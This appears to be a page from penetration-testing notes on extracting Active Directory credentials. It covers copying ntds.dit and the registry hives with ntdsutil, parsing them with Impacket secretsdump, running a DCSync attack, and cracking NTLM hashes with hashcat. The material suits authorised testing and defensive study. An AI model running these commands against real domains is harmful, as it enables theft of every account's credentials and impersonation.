Domain Controller

NTDS Domain Controller

NTDS (Active Directory Database) stores domain-related information in Windows environments. The NTDS data is stored in the following locations:

  • NTDS Database:

    C:\Windows\NTDS\ntds.dit

  • System Configuration:

    C:\Windows\System32\config\SYSTEM

  • Security Configuration:

    C:\Windows\System32\config\SECURITY

Local Dumping (No Credentials)

To access the NTDS database locally, use the following PowerShell command:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can export ntds.dit, SYSTEMand SECURITYusing scp.

Then, use the Impacket suite to crack the data.

python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local

Remote Dumping (With Credentials)

DC Sync Attack

DC Sync is possible when an account has one of the following permissions:

  • Replicating Directory Changes

  • Replicating Directory Changes All

  • Replicating Directory Changes in Filtered Set

To dump hashes remotely with DC Sync, use Impacket:

python3.9 /opt/impacket/examples/secretsdump.py -just-dc <DOMAIN>/<AD_Admin_User>@<IP>  # For NTDS  
python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm <DOMAIN>/<AD_Admin_User>@<IP>  # For NTLM hashes

Cracking NTLM Hashes

Once NTLM hashes are obtained, they can be used for impersonation or cracked to retrieve the password. To crack the hash, use Hashcat:

hashcat -m 1000 -a 0 /path/to/ntlm_hashes.txt /path/to/wordlist/such/as/rockyou.txt
PreviousCredential managerNextLocal Administrator Password Solution (LAPS)

Last updated